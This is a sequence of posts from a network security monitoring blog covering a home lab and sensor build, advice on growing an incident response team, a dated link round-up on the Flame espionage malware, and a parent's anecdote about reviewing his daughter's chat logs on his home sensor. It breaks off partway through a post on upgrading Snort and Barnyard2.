<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7ISa3GFP83IOg8hBlOgdNw1UG0pUifD3gMGSm7nodUWzZBUPrFkTOju-hQybBnJucoXGjzTnwO8eWcIFxVm057rDgPAaR6sUStK5EgP2fFvm00ZQ_1bBNgCN7BmrsZL3h2E53RhBvcz96/s1600/IMG_0192+copy.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="274" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7ISa3GFP83IOg8hBlOgdNw1UG0pUifD3gMGSm7nodUWzZBUPrFkTOju-hQybBnJucoXGjzTnwO8eWcIFxVm057rDgPAaR6sUStK5EgP2fFvm00ZQ_1bBNgCN7BmrsZL3h2E53RhBvcz96/s320/IMG_0192+copy.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The fan slides over the heat sink at the rear of the chassis on the left</td></tr>
</tbody></table>
Next, we put the DVD/CD drive and hard drive into the tray, attached the tray to the chassis, and connected the SATA and power cables. I also added a dual Intel PRO/1000 PT NIC to give a total of three physical network interfaces. We finally tested and everything appeared to be working.<br />
<div>
<h3>
<br /></h3>
<h3>
New Network Architecture</h3>
<div>
<br />
Going to all this trouble for a relatively powerful computer compared to my three old Pentium III servers, I decided to take the opportunity to make a couple of other network changes. I used to run my network sensor <a href="http://eatingsecurity.blogspot.com/2008/01/idsips-placement-on-home-network.html" target="_blank">inline</a>, but along with the new computer I purchased a <a href="http://www.netgear.com/business/products/switches/smart-switches/smart-switches/GS108T-200.aspx" target="_blank">Netgear GS108T-200</a> smart switch. This switch has an abundance of features, including VLANs and port mirroring. Along with the new switch, all I needed was an extra WAP to reconfigure home network as shown below.</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbzkkC5CiwvbEigy4C0md_SP1rhiTwvUYPLHy8Df9-QJ8OhrV05xYkOANeTozxuBQUgEAmft2EOoXJdmARoKSJn5BU3DXcA1zjVYb2Qc_SSpNEapZoqFYi2oPT30L46T1sKNdi6ltVaQOR/s1600/Lab+network.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="392" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbzkkC5CiwvbEigy4C0md_SP1rhiTwvUYPLHy8Df9-QJ8OhrV05xYkOANeTozxuBQUgEAmft2EOoXJdmARoKSJn5BU3DXcA1zjVYb2Qc_SSpNEapZoqFYi2oPT30L46T1sKNdi6ltVaQOR/s640/Lab+network.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The router/firewall also works as a WAP, but to see most client traffic<br />
I disabled it and connected an access point behind the mirroring switch</td></tr>
</tbody></table>
<div>
With this configuration, the switch will mirror traffic to a dedicated network interface on my network sensor. Only traffic that doesn't make it to the switch will not be seen on the mirror port. I can also configure VLANs on the switch if I want to segment the network based on functions like management interfaces and WiFi clients.<br />
<br />
I plan to write more about my lab setup as I continue to redevelop it. The first thing I did after testing the new box was install ESXi and create a network sensor VM using <a href="http://securityonion.blogspot.com/" target="_blank">Security Onion</a>. I may have a post about it soon.</div>
</div>
Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com1tag:blogger.com,1999:blog-297187840164530151.post-71166416773633070372013-03-29T10:53:00.001-04:002013-03-29T10:53:51.387-04:00CERT is hiringThe company I work for is hiring. For those that don't know, <a href="http://www.cert.org/" target="_blank">CERT</a> is part of the <a href="http://www.sei.cmu.edu/" target="_blank">Software Engineering Institute</a> at Carnegie Mellon University. CERT was created in 1988 as part of the response to the Morris worm. You can find out more on CERT's "<a href="http://www.cert.org/meet_cert/" target="_blank">About Us</a>" page.<br />
<br />
If you are interested, please read more about our <a href="http://www.cert.org/jobs/hiring_process.html" target="_blank">hiring process</a> and browse some of the <a href="http://www.cert.org/nav/jobs.html" target="_blank">available positions</a>. The positions are primarily in Pittsburgh with a few openings in Arlington, VA. The open positions cover network security analysis, security architecture, malware analysis, software development, vulnerability analysis, and more.<br />
<br />
I consider our hiring process fairly grueling but also stimulating. It gives the prospective employee and prospective coworkers a good chance to really learn if the relationship will work. It is an opportunity not just for the candidate to get interviewed, but also for the candidate to interview those that already work at CERT.<br />
<br />
One of the reasons we have so many vacant positions is because we try to maintain high standards when considering candidates. Most of our positions require a fair amount of experience and expertise. My colleagues are smart, diligent, and largely enthusiastic about their chosen professions. Don't get me wrong -- we still have bad days when we are less enthusiastic or unhappy about the state of information security, but this is a pretty cool place to work. We do a wide variety of both research and more operationally focused work, tackling a lot of big problems. We also get a fair amount of freedom to find interesting and challenging areas of work.<br />
<br />
If I know you or know of your work, please contact me about using my name as a referral. A referral from a current CERT employee can be helpful when applying. The best way to contact me regarding a referral or to ask other questions is via email or LinkedIn. You can also post questions more publicly here on my blog if it seems appropriate. In the interest of disclosure, I have an interest in recruiting people that I will want to work with but also could potentially get a referral bonus if you list me when you apply.Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com0tag:blogger.com,1999:blog-297187840164530151.post-68422727899006562022013-03-11T16:14:00.001-04:002013-03-11T16:14:57.676-04:00Building an IR Team: GrowthThis is a long overdue continuation of my posts regarding Building an Incident Response Team. I had a very rough outline of this post going all the way back to 2009! The good response I got on some of my previous posts on building IR teams made me come back and work on finishing the posts I had planned when I first started the series.<br />
<br />
Previous posts:<br />
<ul>
<li><a href="http://eatingsecurity.blogspot.com/2009/07/building-ir-team-documentation.html">Building an IR Team: Documentation</a> </li>
<li><a href="http://eatingsecurity.blogspot.com/2009/06/building-ir-team-organization.html">Building an IR Team: Organization</a> </li>
<li><a href="http://eatingsecurity.blogspot.com/2009/04/building-ir-team-people.html">Building an IR Team: People</a> <br />
</li>
</ul>
I believe one of the hardest things to deal with when building a successful IR team is growth. If you build an IR team that is successful and gets management buy-in as a result, there is a good chance that responsibilities, the amount of work, the number of incidents detected, and the size of the team will all grow. This will invariably cause growing pains, setbacks, and reevaluation of procedures.<br />
<br />
I honestly could go on and on about dealing with the growth of an IR team. There are so many things to consider that it is daunting to plan for growth ahead of time instead of just dealing with the hurdles as they come. However, if you have a team that is growing it really helps to take a step back and plan for both immediate and long-term growth. It is so important that a fair amount of this post will reiterate what I have explicitly or implicitly said in some of my previous "Building an IR Team" posts.<br />
<br />
There are a number of questions to keep in mind when an IR team grows. What are the additional duties causing the addition of positions? Are the additional positions adequate to cover the additional duties and responsibilities? If not, how can expectations be managed so superiors understand what is actually feasible? Are the duties just a higher volume of what the team already is responsible for, or are there new areas that will require different types of team members and different types of training? What works well now but may be problematic with a larger team? Do we need to restructure? How do we maintain the success that led to the IR team growth? The last question is one of the most fundamental.<br />
<br />
<h3>
Relationships</h3>
<br />
At one point I worked on a team that, over the course of a few years, increased the number of personnel fourfold. This completely changed the dynamics of the team, from the lead all the way down to the most junior analyst. The more people you add, the more complex the relationships become. This applies not only to relationships within the team, but also relationships with other parts of your organization and management.<br />
<br />
With such growth, it became a lot more important to clearly define roles and responsibilities, the command structure, and get management support of decisions.<br />
<ul>
<li>Command structure: As the team grows, other groups in the company are less likely to know each person on the team. This means in a lot of cases it is helpful to have a few key people known to those other groups. These key people don't have to always be the ones to communicate with a specific group, but can be used as a fallback if the other group's first instinct is to be more adversarial with those people they don't know.</li>
<li>Intra-team relationships: The more people you have, the more you have to keep an eye on the working relationship between members. When you have a team that numbers single digits, it is almost natural to know all the ins and outs of the working relationships, for example who complements each other and who can be a good mentor to more junior analysts. It takes more conscious effort to track as you increase the number of people. Not only that, it requires more actively setting expectations about what you expect of them.</li>
<li>Management support and inter-team relationships: As a team gets bigger, its profile is raised throughout the company. This can make dealing with other groups easier, more difficult, or most likely a little bit of both. As we all know, IR teams sometimes need to make decisions or do things that are not popular and people outside the team view as irritating to say the least. It is very important to have management support when you invariably have conflicts with those outside the IR team. It's also important to have a manager that knows when to tell you that you're being unreasonable and the outside groups have a reasonable concern or complaint.</li>
</ul>
This is by no means a complete list of things to consider. The bottom line is that a larger team makes both intra- and inter-team relationships more complex.
<br />
<br />
<h3>
Other Growing Pains</h3>
<br />
The simplest example I have from the past regarding growing pains was when I was on a team that was not gaining new areas of responsibility but was switching to coverage 24 hours a day seven days a week. As I covered in another blog post, it is important come up with the proper <a href="http://eatingsecurity.blogspot.com/2009/06/building-ir-team-organization.html" target="_blank">organization</a> and make sure every shift was productive. Increasing the number of hours of coverage also obviously means hiring new analysts, plus the possibility of shifting current analysts to drastically different schedules.<br />
<br />
Restructuring can often cause conflicts beyond those involving work schedules. On a small team, most people gravitate to a niche and can often be allowed to work in it as long as they also can handle the more generalized response duties. In a larger team, it's much harder to let members naturally gravitate towards certain areas while maintaining the ability to get all the work done. It certainly is nice to keep everyone happy and specializing in the areas they are most interested in, but it's not always realistic. One way to help with this is to make sure you follow the advice for redundancy in the "<a href="http://eatingsecurity.blogspot.com/2009/06/building-ir-team-organization.html" target="_blank">Organization</a>" post, plus allow members to rotate through different areas of specialty. This means they won't be stuck in one particularly area in addition to providing redundancy of skills.<br />
<br />
Another issue is making sure you formalize reporting to some degree. In a team of a few people, it's readily apparent what each person is doing. When you have a score of people, you need to get both formal and informal reporting from shift leads, team leads, mentors, and even individual analysts to properly understand who is doing what, workloads, what is working well, and what is not working. Regardless, the structure of a larger IR team probably needs to be more formal when it is larger. Notice the "probably." I think it is safe to say there may be exceptions to all these points! The key is to find the proper balance that enables useful reporting while avoiding unneeded bureaucracy.<br />
<br />
Hiring can also create growing pains. I must stress that you should do everything possible to maintain standards when hiring. That said, a bigger team can mean more room and opportunity for less experienced analysts. One weak link among five people is a much bigger deal than one weak link among 30, so a larger team can allow you to take a chance or two when hiring. I've always been an advocate of getting smart people that can learn and are legitimately interested in the field over those who have experience but less potential for growth, and a larger team can sometimes make this easier to justify.<br />
<br />
<h3>
Evaluation of Procedures and Operations</h3>
<br />
This advice really applies to all IR teams, but becomes more important with growth. Incident response procedures that work well in a small team may not work as well with a larger group. Even if your team has not grown, you may want to regularly reevaluate IR workflow, reporting, or just about any existing procedures and standards of operations. Sometimes it may mean more clearly codifying what were once informal standards, while other times it may mean completely rethinking how you operate because you have several tiers of analysts. Having good metrics so you can try to make reevaluation more objective and less subjective also helps. Unfortunately, metrics is a huge topic that I can't address in this post, but there are many sites, papers, books, and more to help anyone interested in the topic.<br />
<br />
Standards for working with the field may also need to change. If you are in an enterprise where the IR team often is reaching out to "boots on the ground" like local system administrators or IT staff, there may need to be changes in areas of responsibility when the IR team is larger. I partially covered this when mentioning inter-team relationships. Even if your IR team is comfortable contacting those in the field directly, those managing the people in the field may want a more formal command structure so they can track requests and other communications from the IR team. Contacts in the field may also want their roles and responsibilities more formally or clearly defined. This is easier to work through when the IR team only has a few people, but once there are dozens it can cause problems if those in the field don't know upfront what the IR team expects and what qualifies as an unusual request from the IR team.<br />
<br />
<h3>
Training</h3>
<br />
A larger IR team means the company is spending a lot more money on the team and security in general. It also means you may have enough team members to form a class-sized group. Whether you use in-house training, outsource, or a combination, a larger team means you will need to think about more formal training where a large group is in a classroom environment. This doesn't mean one-on-one or one-on-few mentoring and training should go away, but you will need to adapt to training larger groups. You also should consider setting aside money specifically for training if that was not done previously.
<br />
<br />
<h3>
Be Flexible</h3>
<br />
Note that this is all based on my experiences in the past 10 or more years, but it is just the tip of the iceberg. Different teams may have different issues to consider when growing. Depending on the specific IR team, none of what I wrote may apply directly. I think there are two overriding concerns when an IR team grows. One is to be flexible as the team grows so your organization can really see what works and what does not. Two is to plan for the growth instead of just letting it happen haphazardly. Some teams do quite well with very little change after they've grown, while some may need drastic changes just because of adding a few people or analyst turnover.<br />
<br />
<h3>
Other Resources</h3>
<br />
There are some resources available to help deal with creating IR teams, and much of what applies at creation of a team can apply to the growth of a team. When a team goes from a few people to 20-30 people, you essentially are destroying the old team and creating a new one. Most of the questions considered when creating an IR team can be asked once again and reevaluated as the team grows.
<br />
<ul>
<li><a href="http://www.cert.org/csirts/Creating-A-CSIRT.html" target="_blank">Creating a Computer Security Incident Response Team: A Process to Getting Started</a> from CERT.</li>
<li><a href="http://www.cert.org/archive/pdf/csirt-handbook.pdf" target="_blank">Handbook for Computer Security Incident Response Teams</a> (PDF) from CERT, which is not recent but still has a lot of useful information.</li>
<li><a href="http://www.unisys.com/unisys/inc/countrysites/pdf/4_HPEnterpriseSecurity_Whitepaper_SuccessfulSOC.pdf" target="_blank">Building a Successful Security Operation Center</a> from HP.</li>
<li><a href="http://www.ietf.org/rfc/rfc2350.txt" target="_blank">RFC 2350: Expectations for Computer Security Incident Response</a> from 1998.</li>
</ul>
Richard Bejtlich has posted on <a href="http://taosecurity.blogspot.com/" target="_blank">his blog</a> about many aspects of building and maintaining SOCs, and also mentioned that he will have a chapter in his <a href="http://nostarch.com/nsm" target="_blank">new book</a> titled "Network Security Monitoring Operations," focused on sharing "the author’s experience building and leading a global Computer Incident Response Team (CIRT), such that readers can apply those lessons to their own operations." I presume anyone regularly reading my blog is already reading Taosecurity, and also anticipate that his new book will be quite useful.<br />
<br />
<div>
I hope to have at least one more post in my "Building an IR Team" series. I may also have additional material, or collate and improve all my existing posts if I feel it is worthwhile.<br />
<ul>
</ul>
</div>
Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com0tag:blogger.com,1999:blog-297187840164530151.post-92195123648625231612013-03-01T20:19:00.001-05:002013-03-04T00:37:44.669-05:00Reflections on Over Five Years of BloggingMy first post to this blog was in September, 2007. Professionally speaking, I have gone through major changes since then. I've changed employer, though amazingly enough in this line of work that happened only once during that time. I have also learned a lot and my duties have changed quite a bit.<br />
<br />
Though I try to stay plugged in to incident response, NSM, and all those other operational bits I love, I am definitely a step back from directly responding to incidents compared to a lot of my previous experience. Another big change for me is that I no longer run a bunch of NSM sensors though I still do that type of administration on my home network. On the other hand, one of the wonderful things about my current employer is that they allow us a lot of freedom to identify problems or challenges then take them on without trying to pigeonhole us. I look forward to 2013 as a year in which I will continue being challenged by taking on some new projects of interest to me.<br />
<br />
I've gotten a number of links and traffic bursts on some of my past blog posts, which is flattering. I don't particularly feel like a unique snowflake that should get a ton of web traffic and don't usually get a ton of traffic, but occasionally I will really hit the nail on the head with a technical post and get a lot of traffic and links from other bloggers. Unsurprisingly, many of my top posts are in the system administration category since the more security-focused posts probably have a narrower target audience.<br />
<br />
I attended <a href="http://www.cert.org/flocon/" target="_blank">FloCon</a> 2013 in January, which made me reflect on a couple things. First, I am going to try and blog a little more often this year. It was very flattering to talk to people at the conference and have them say they have read my blog or to <a href="https://twitter.com/eatingsecurity/status/288379250908749825" target="_blank">find they were using content I had contributed to NSMWiki</a>. When I started this blog, my two main goals were to provide references for myself and to make those references available to others in case they also found them useful. It is good to know that my blog and other public contributions have been useful to others. I would not be where I am without similar help from others and I think that sharing of information, advice, experience, and debate is a great thing about much of the security community.<br />
<br />
The second thing it drove home is that I need to end the semi-anonymous nature of this blog. At FloCon I found that I had coworkers following me on Twitter without even realizing it was me that they were following!<br />
<br />
My previous employer knew about my blog and did not give me any grief whatsoever, but at the same time they were somewhat nervous about it. My current employer embraces public engagement to a much larger degree. Plenty of people already knew my name prior to this and Richard Bejtlich even linked to my blog using my name at least once, but generally I did not promote myself as the author. It is time to change that.Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com1tag:blogger.com,1999:blog-297187840164530151.post-60741578801046587352012-06-15T20:06:00.002-04:002012-10-07T15:41:23.826-04:00CERT's FloCon 2013 CFP<a href="http://www.cert.org/flocon/index.html#cfp" target="_blank">CERT's FloCon 2013 CFP</a> is posted.<br />
<br />
Albuquerque, New Mexico, on January 7–10, 2013.<br />
<br />
I plan to attend.Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com1tag:blogger.com,1999:blog-297187840164530151.post-38355735073810468192012-06-08T17:15:00.000-04:002012-06-13T14:11:47.032-04:00Flame Round-upUpdated June 13 with a few more links.<br />
<br />
I decided to write a short post with a Frame timeline, links to the related information, and a brief summary of interesting information available at each link. I might update this post if I get comments with additional interesting links or if there are significant new developments. When possible, I'm trying to catalog technical discussion rather than news aimed at a general non-technical audience.<br />
<br />
Note that many of the dates, on blog posts in particular, will reflect the last time the post was changed rather than initial posting date. This can be a problem when relying on sites that do not show both a publication and modification date for web publications. I will note when I know of discrepancies in date.<br />
<br />
2012 May 28:<br />
<br />
<a href="http://www.kaspersky.com/about/news/virus/2012/Kaspersky_Lab_and_ITU_Research_Reveals_New_Advanced_Cyber_Threat" target="_blank">Kaspersky Lab and ITU Research Reveals New Advanced Cyber Threat</a>: Kaspersky Lab posts information about new malware dubbed Flame. They were investigating incidents related to something known as Wiper on behalf of the <a href="http://www.itu.int/" target="_blank">ITU</a> and discovered Flame in the process. Kaspersky calls Flame a "super-cyberweapon" and says the primary purpose is cyber espionage. The end of the article includes a link to <a href="http://www.securelist.com/en/blog/208193522/The_Flame_Questions_and_Answers" target="_blank">The Flame: Questions and Answers</a>, a technical FAQ. Judging by the CrySyS report (below), Wiper and Flame could actually be one and the same.<br />
<br />
<a href="http://www.certcc.ir/index.php?name=news&file=article&sid=1894" target="_blank">Identification of New Targeted Attack</a>: Dated the same day as the Kaspersky Lab post, the Iranian CERTCC (MAHER) posts information gleaned from an investigation into Flame. They include bullet points listing some of Flame's behaviors and capabilities.<br />
<blockquote class="tr_bq">
<ul>
<li>Distribution via removable medias</li>
<li>Distribution through local networks </li>
<li>Network sniffing, detecting network resources and collecting lists of vulnerable passwords </li>
<li>Scanning the disk of infected system looking for specific extensions and contents </li>
<li>Creating series of user’s screen captures when some specific processes or windows are active </li>
<li>Using the infected system’s attached microphone to record the environment sounds </li>
<li>Transferring saved data to control servers </li>
<li>Using more than 10 domains as C&C servers </li>
<li>Establishment of secure connection with C&C servers through SSH and HTTPS protocols </li>
<li>Bypassing tens of known antiviruses, anti malware and other security software </li>
<li>Capable of infecting Windows Xp, Vista and 7 operating systems </li>
<li>Infecting large scale local networks
</li>
</ul>
</blockquote>
Both Kaspersky Lab and MAHER tie Flame to Stuxnet and Duqu. Kaspersky later referred to this post by MAHER taking place on May 27 rather than date listed on the page, which is May 28.<br />
<br />
CrySyS Lab publishes their first version of the 64 page <a href="http://www.crysys.hu/skywiper/skywiper.pdf" target="_blank">sKyWIper (Flame) technical report</a>, updated to version 1.05 as of May 31. The report states that Flame may have been active for as long as five to eight years at the time of discovery. The report details modules, encryption, activation, propagation, component descriptions, C&C details, scripts, and evasion techniques.<br />
<br />
2012 June 01:<br />
<br />
OpenDNS provides a <a href="http://blog.opendns.com/2012/06/01/unique-insight-into-flame-malware/" target="_blank">timeline of command and control domain registrations</a>. Domains were registered and active as far back as 2008. <br />
<br />
The New York Times publishes an article, <a href="http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html" target="_blank">Obama Ordered Wave of Cyberattacks Against Iran</a>, detailing efforts directed first by the Bush administration and increased by the Obama administration to use cyberattacks to slow Iranian nuclear development. The article ties the attacks most directly to Stuxnet and was adapted from David E. Sanger's new book, <i>Confront and Conceal: Obama's Secret Wars and Surprising Use of American Power</i>.<br />
<br />
2012 June 03:<br />
<br />
Microsoft issues <a href="http://technet.microsoft.com/en-us/security/advisory/2718704" target="_blank">Security Advisory (2718704): Unauthorized Digital Certificates Could Allow Spoofing</a> after revelations that Flame was using a cryptographic collision and terminal server licensing certificates to sign code, allowing spoofing of Windows Update. Microsoft issued an emergency patch that blacklisted the three intermediate certificate authorities.<br />
<br />
2012 June 04:<br />
<br />
ArsTechnica rounds up links, quotes, and information in <a href="http://arstechnica.com/security/2012/06/flame-malware-was-signed-by-rogue-microsoft-certificate/" target="_blank">"Flame" malware was signed by rogue Microsoft certificate</a>. I will not repeat their work, but instead say that they did a good job providing information along with links to more detailed posts and articles from the various players that have been active in the dissemination of information about Flame.<br />
<br />
Kaspersky Lab posts <a href="http://www.securelist.com/en/blog/208193540/The_Roof_Is_on_Fire_Tackling_Flames_C_C_Server" target="_blank">The Roof is on Fire: Tackling Flame's C&C Servers</a>. The post includes a chart comparing Duqu and Flame command and control infrastructure, from choice of OS (CentOS for Duqu, Ubuntu for Flame) to number of known C&C domains (80+ for Flame), and more. They go into great detail about the C&C architecture, including the domains being purchased primarily through GoDaddy, the fake identities used for registration, the technical details of the C&C infrastructure, and a list showing the geographic distribution of infections. OpenDNS's timeline links to this post by Kaspersky Lab, so it was presumably posted around the same day, June 01, then updated later.<br />
<br />
2012 June 05:<br />
<br />
Bitdefender Labs details how Flame uses USB and old-fashioned sneakernet to move data off systems that are not connected to the Internet and onto systems that have previously connected to Flame's C&C servers. <a href="http://labs.bitdefender.com/2012/06/flame-the-story-of-leaked-data-carried-by-human-vector/" target="_blank">FLAME – The Story of Leaked Data Carried by Human Vector</a> also mentions how Flame is different from much other malware, for instance very large file sizes and no anti-debugging or anti-reversing code.<br />
<br />
2012 June 06:<br />
<br />
Microsoft Security Research and Defense posts <a href="http://blogs.technet.com/b/srd/archive/2012/06/06/more-information-about-the-digital-certificates-used-to-sign-the-flame-malware.aspx?Redirected=true" target="_blank">Frame malware collision attack explained</a>. This goes into detail and is well worth reading. Notable is that Windows versions older than Vista would have been vulnerable without the MD5 collision, but newer versions required the collision attack.<br />
<br />
ArsTechnica also posts on the subject and links to the same MS post among others in their <a href="http://arstechnica.com/security/2012/06/flames-god-mode-cheat-code-wielded-to-hijack-windows-7-server-2008/" target="_blank">Flame's "god mode cheat code" wielded to hijack Windows 7, Server 2008</a>. Included is a <a href="http://arstechnica.com/security/2008/12/theoretical-attacks-yield-practical-attacks-on-ssl-pki/" target="_blank">link to a write-up about a theoretical MD5 collision attack</a> dating back to 2007, which itself was an extension of work from 2004. In 2008, the attack went from theoretical to practical.<br />
<br />
Symantec's blog post titled <a href="http://www.symantec.com/connect/blogs/flamer-urgent-suicide" target="_blank">Flamer: Urgent Suicide</a> details remaining Flame C&C servers sending a command to essentially uninstall from infected systems by deleting then overwriting Flame files with random data.<br />
<br />
Related to the topic of cyber espionage but not dealing directly with Flame, <a href="http://www.washingtonpost.com/business/google-adds-warning-to-users-of-possible-state-sponsored-attacks/2012/06/06/gJQAFQePIV_print.html" target="_blank">Google announces that they will warn users of possible state-sponsored attacks</a>. <br />
<br />
2012 June 07:<br />
<br />
Details start to emerge that Flame used a new collision attack. ArsTechnica posts <a href="http://arstechnica.com/security/2012/06/flame-crypto-breakthrough/" target="_blank">Flame breakthrough shows Flame was designed by world-class scientists</a>. Marc Stevens and B.M.M de Weger are quoted as saying that the <a href="http://www.cwi.nl/news/2012/cwi-cryptanalist-discovers-new-cryptographic-attack-variant-in-flame-spy-malware" target="_blank">collision attack was new</a>.<br />
<blockquote class="tr_bq">
“Flame uses a completely new variant of a ‘chosen prefix collision
attack’ to impersonate a legitimate security update from Microsoft. The
design of this new variant required world-class cryptanalysis,” says
Marc Stevens. “It is very important to invest in cryptographic research,
to continue to be ahead of these developments in practice.”</blockquote>
This adds to the ever-present but growing evidence regarding the type of resources needed for Flame.<br />
<br />
2012 June 11:<br />
<br />
Bitdefender Labs get into some great detail on components within Flame, including comparisons to Stuxnet, in <a href="http://labs.bitdefender.com/2012/06/stuxnets-oldest-component-solves-the-flamer-puzzle/" target="_blank">Stuxnet's Oldest Component Solves the Flamer Puzzle</a>.<br />
<blockquote class="tr_bq">
"As mentioned before, atmpsvcn.ocx was believed to belong to Stuxnet:
more to the point, its MD5 hash (b4429d77586798064b56b0099f0ccd49) was
detected in a Stuxnet dropper. This irrefutably places it as a Stuxnet
component. It is common knowledge that Stuxnet used quite an array of
droppers, and one of the oldest such droppers, dated from 2009, also
contains the atmpsvcn.ocx component. Inside the dropper, we identified a
resource encrypted using XOR 255 (0xFF) that is 520.192 bytes large and
has the same hash: b65f8e25fb1f24ad166c24b69fa600a8.<br />
<br />
This concludes the first part of the demonstration. There is no doubt
about it being a Stuxnet component, but today’s demonstration will shed
new light on how it fits in the Flamer puzzle."</blockquote>Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com0tag:blogger.com,1999:blog-297187840164530151.post-71268848905281825162012-06-04T05:00:00.000-04:002013-04-04T23:50:02.236-04:00A Practical Example of Non-technical Indicators and Incident ResponseOnce upon a time there was a network security analyst slash NSM engineer
who, like any sane person, ran full packet capture, IDS/IPS, session capture,
and passive fingerprinting inline at the ingress/egress of his home network.
His setup was most similar to diagram two in <a href="http://eatingsecurity.blogspot.com/2008/01/idsips-placement-on-home-network.html">IDS/IPS
Placement on Home Network</a>.
<br />
<br />
This security analyst was casually going about his business
one day when he opened the basement door of his house and found a tennis ball
wedged between the door frame and the storm door. “That’s odd!” he thought.
“Who would do that?”
<br />
<br />
After removing the tennis ball, he thought, “Well, this
storm door is really loud when it closes those last few inches. Maybe someone
did it to quietly enter or exit the house.” It just so happens that the
daughter of said analyst was in high school and her bedroom was down the hall from the basement door. He promptly entered her room and took a quick look around. Lo and behold, the
screen from her window was under her bed and the window itself was unlocked.
Since this room was on the ground floor, the analyst immediately had some good
ideas about what was happening with the window and the basement door. Someone
was sneaking in or out of the house!
<br />
<br />
The analyst confronted his teenage daughter when she got
home from school and received denial after denial about any possible
wrongdoing. The denials did not sound sincere.
<br />
<br />
Enter the network security monitoring. He stated, “I told you I would
respect your privacy with your email and other electronic communications unless
you gave me a reason not to. I consider you in violation of these Terms of
Service and I’m going to see what you’ve been up to lately.”
<br />
<br />
At this point it was late in the evening and the analyst had
to get up early for work. This was some years back when AIM was quite common,
so he briefly used Sguil to look at recent sessions of AOL Instant Messenger
traffic. He decided to get some sleep for work the next day and put off additional
investigation. In the meantime, his daughter's privileges were highly restricted.
<br />
<br />
A day or two later, after trying to manually sift through
some of the ASCII transcripts of the packet captures the analyst quickly
decided there was a better way. He whipped up <a href="http://eatingsecurity.blogspot.com/2007/11/for-loop-with-tcpdump.html" target="_blank">a short shell script to loop through all the packet captures</a>, run Dug Song’s msgsnarf, and pipe the output into an HTML file for later examination. This required a little tweaking to make the HTML easily readable, but it was fairly quick to write and test the script.<br />
The next morning there were many hundreds of lines of AIM conversations
to examine. He started working from the most recent and reading backwards.
After a few minutes he quickly confirmed that his daughter had been sneaking
out of the house to go to parties and get into other mischief.
<br />
<br />
Another conversation with his daughter finally led to her
confession, a long discussion, and suitable punishment. Despite the severity of
her actions, the HTML file containing the chat transcripts also contained a few endearing nuggets.
<br />
<br />
Daughter: OMG they know everything!<br />
Accomplice: what do u mean everything<br />
Daughter: my dad can read all my chats<br />
Daughter: he does computer security for [company redacted]<br />
Daughter: he’s a computer genius<br />
Daughter: DAD I’M INNOCENT!<br />
<br />
Upon telling this story to a current colleague, he mentioned
that the last few lines are the best father’s day gift the analyst would ever receive.
<br />
<br />
I think there are a few obvious lessons here that can translate
to network monitoring.
<br />
<br />
First, the initial indicator of the problem was in the
physical world. Network security monitoring or any other type of technical
monitoring and prevention will fail. I have experienced many times when phone
calls from users have been one of the earliest indicators of malicious
activity. Particularly in the case of insider threats, it's important to note that many initial indicators of malicious activity are non-technical, like a person's behavior, personnel action, or in this case a physical indicator of a security problem.
<br />
<br />
Second, sometimes you need to be flexible to solve a problem
quickly and with minimal effort. The analyst could have manually looked at the AIM
traffic, but because he judged that the threat of another incident was already
mitigated by talking to the daughter, digging up the traffic wasn’t urgent. Instead, The analyst decided to write the script that would pull all the traffic and convert it to a readable format. The analyst also had the luxury of knowing that all the packet captures would still be there since his home bandwidth at the time meant well more than 30 days of pcap storage.
<br />
<br />
Third, network monitoring is a means to an end. In this
case, there was a security problem that could be addressed with the help of
technical means. In many obvious cases you are trying to protect data. In other
cases, you can be trying to protect people or things in the physical world that
could be harmed if the wrong information is revealed. It is important to stay
focused on what really matters and not get caught worrying about the wrong
things because your instrumentation or technologies push you towards priorities
that don’t make sense.<br />
<br />
Last, attackers are not static. The daughter definitely learned the value of encryption and even using out-of-band communication in the form of SMS over the phone network if she did not want the network sensor recording her conversations in plain text. Technology advancement also makes attackers evolve, for instance with the move to Facebook chat or SMS from older forms of IM.Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com0tag:blogger.com,1999:blog-297187840164530151.post-54038565141807215212012-03-26T07:26:00.000-04:002012-03-26T07:30:05.647-04:00Updating to Snort 2.9.2 and Barnyard2After fixing hardware problems that had my home network sensor out of commission for the better part of a year, I recently got the system inline again. Because the sensor had been down for so long, I was running a fairly old version of Snort, 2.9.0.3, along with barnyard 0.2.0. I decided the first thing I should do after updating the OS itself was update Snort and Barnyard.<br />
<br />
I won't go through the process in detail since there are many resources online for installing and configuring Snort. The main thing I will point out is that you should always look in the <span style="font-family: "Courier New",Courier,monospace;">docs/</span> directory for information on installing and upgrading. If you're updating from a previous version, pay particular attention to changes and new features. Another important thing to do is look closely at the <span style="font-family: "Courier New",Courier,monospace;">snort.conf</span> provided with a given version in <span style="font-family: "Courier New",Courier,monospace;"><src dir="">etc/</src></span> since it will have a lot of information on defaults and configuration directives that may be required. These won't always be the same as previous versions. It's also important to update to the latest rule sets, check for new rules files, and do all the other normal tuning to make sure certain rules are turned off or on.<br />
<br />
I had two main problems when I updated, one with Snort and one with Barnyard2. Since Snort is the main piece of the puzzle here, I updated it prior to Barnyard. After updating to Snort-2.9.2.1 and fixing the configuration, I was able to run Snort successfully using the options I normally had previously. However, as soon as I put the sensor back inline and Snort started processing packets, Snort would exit with an error.<br />
<br />
<tt>Can't acquire (-1) - ipq_daq_acquire: ipq_read=-1 error Failed to receive netlink message!</tt><br />
<br />
